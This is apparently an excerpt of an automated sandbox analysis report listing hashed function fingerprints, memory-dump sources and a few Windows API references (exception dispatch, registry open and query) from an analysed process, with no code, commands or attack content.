                                                • Instruction ID: 3f98149ebd42a836d1bb89d6745f173b5e040448618a48987bf2c994ed21c1b1
                                                • Opcode Fuzzy Hash: 0e735046a836fdabd04e941a66ea2e99ffdb6a2cba7407ce8932b1045e62c72b
                                                • Instruction Fuzzy Hash: 724238B4A14228CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 042b170ffd7550c4d1bf287ca93b4627bd71f1cb49ac195ba9a9ba5dcd7a8234
                                                • Instruction ID: 2d5401237be490d8097ec47355a01b12e169d2c9068263d8dceebe09ef2a3837
                                                • Opcode Fuzzy Hash: 042b170ffd7550c4d1bf287ca93b4627bd71f1cb49ac195ba9a9ba5dcd7a8234
                                                • Instruction Fuzzy Hash: 4C3239B4A14218CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 85765aedcd589e313858a313276a28224640316ee37918aff2f6b43c0d48dffd
                                                • Instruction ID: 00587a92c5dbae4072e34a9da39e4b137754e46b8ae29f8317ac2cc6a4550e73
                                                • Opcode Fuzzy Hash: 85765aedcd589e313858a313276a28224640316ee37918aff2f6b43c0d48dffd
                                                • Instruction Fuzzy Hash: 473228B4A14228CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 935ccaa1c30324d63053b734021c53dac65d0cb57986602efcd144251bc7a9c8
                                                • Instruction ID: db78ff936ba3bea9a6239c878e31fa446658946a739f39f78c91268054816299
                                                • Opcode Fuzzy Hash: 935ccaa1c30324d63053b734021c53dac65d0cb57986602efcd144251bc7a9c8
                                                • Instruction Fuzzy Hash: 4E3228B4A14228CFCB249F70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 89a4015e79f94bcd4112c1c2d35b66f80cde9cba1b322ebc96b3e81cd4ed82e1
                                                • Instruction ID: 689fd603da5a06d5aecde5a7dfc5fb6fb75a37a4ed23cf1d0ab87e2d49157693
                                                • Opcode Fuzzy Hash: 89a4015e79f94bcd4112c1c2d35b66f80cde9cba1b322ebc96b3e81cd4ed82e1
                                                • Instruction Fuzzy Hash: C13229B4A14228CFCB249F70C99869DB7B6BF48305F2084EAE50AE7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0052C9F9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359714399.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID:
                                                • API String ID: 3660427363-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0052C78C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359714399.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a22c413fb2187c909941284a45de610cac0bf8aaff978a963395a9bd787ae0f9
                                                • Instruction ID: 501dde7aac0695dd122c6dbae45ec116a579206ac7b46568cc0258e1cd6e1ea5
                                                • Opcode Fuzzy Hash: a22c413fb2187c909941284a45de610cac0bf8aaff978a963395a9bd787ae0f9
                                                • Instruction Fuzzy Hash: FD212575600208DFDB05DF10E9C0B26BF76FF94328F24C569E8090B246C336D856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1e94eca7b757a15a6b80fbc53dd473468060abf6f29373081badf6c8fb75611
                                                • Instruction ID: 65fc637406a2c39a3d9a7c07b4a558966b8410249ed95517b47f3ab675d8ceda
                                                • Opcode Fuzzy Hash: b1e94eca7b757a15a6b80fbc53dd473468060abf6f29373081badf6c8fb75611
                                                • Instruction Fuzzy Hash: C421CF75604248DFDB19DF50E980B2ABF75FF98328F24C569E80D0B246C336D856CAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359558703.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e44954c5eaf5e9319b950fc15fbc6e3fed33352ad5955bf202badad8ddd115d3
                                                • Instruction ID: 5a1abffd5ef7d1c4620b3d465c524da8a8277d862e7755fe0c2500153e1a2a0d
                                                • Opcode Fuzzy Hash: e44954c5eaf5e9319b950fc15fbc6e3fed33352ad5955bf202badad8ddd115d3
                                                • Instruction Fuzzy Hash: 4821F275604304DFDB18EF60E980B16BBA5EB84318F24C969E8094B286C736D907CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction ID: b8af6420bf83e7f03e9ccae9fc4a4c947ebe487dfcfd1548c4c0142e13566682
                                                • Opcode Fuzzy Hash: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction Fuzzy Hash: AE118176504244DFCB16CF14E5C4B16BF72FF94318F24C6A9D8094B656C336D856CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction ID: 075fd8a43547e0c9df279b4e536f4f995d1603f296b442e6f264c35f73dc1615
                                                • Opcode Fuzzy Hash: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction Fuzzy Hash: 1111AF76404284CFCB16CF10E9C4B16BF71FF94324F28C5A9E8090B216C336D856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359558703.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 891f902d58dedbad28416925344a3d969c18e8e5d994e9510d10cfbfcd7c61e7
                                                • Instruction ID: 179e59172d0e725dcb2208a02c7f7cc0df1900b7958d20b8b7310d71074f9879
                                                • Opcode Fuzzy Hash: 891f902d58dedbad28416925344a3d969c18e8e5d994e9510d10cfbfcd7c61e7
                                                • Instruction Fuzzy Hash: A311BB75508380CFCB11CF10E584B15BBA1FB84314F28C6AAE8094B696C33AD90BCFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6c87842533c48827f2b22f5bef0d71e18cbb8d3ba352358018fcf29705bdb8b
                                                • Instruction ID: 49fcec9839d3d14abacaf2b9c85fec138bd0397b87a64415fee7f5c29b3cc9ee
                                                • Opcode Fuzzy Hash: b6c87842533c48827f2b22f5bef0d71e18cbb8d3ba352358018fcf29705bdb8b
                                                • Instruction Fuzzy Hash: B6115EB5F142199F8B80EBB8D8409AEB7F5FF88710B108429E549E7354EB34AD028F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b555f4a6de6909162bc33a39f724b976ef83bd7b71aaeb87558c9f2d46d03f8
                                                • Instruction ID: 38c87987adc8dffc74083342047dab113673eceba87a0955492ed458a8e453e3
                                                • Opcode Fuzzy Hash: 1b555f4a6de6909162bc33a39f724b976ef83bd7b71aaeb87558c9f2d46d03f8
                                                • Instruction Fuzzy Hash: 6B012231A00A008BCB18BB78E4941BCBBB2AF84314F02486CC19B9B650EF355999C796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e67354e1b6eaf9ac29c6030ee24425cde54474e3e754717ea418fd5faaddfa8
                                                • Instruction ID: 58fec58e2cb64999166e88a06c540f5f2a7301429a879ddcf690266e624f3769
                                                • Opcode Fuzzy Hash: 0e67354e1b6eaf9ac29c6030ee24425cde54474e3e754717ea418fd5faaddfa8
                                                • Instruction Fuzzy Hash: DDE09279F140188B8F44E7F8E8444DD73F1FF88225B104425D40AEB350EF34AC028B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions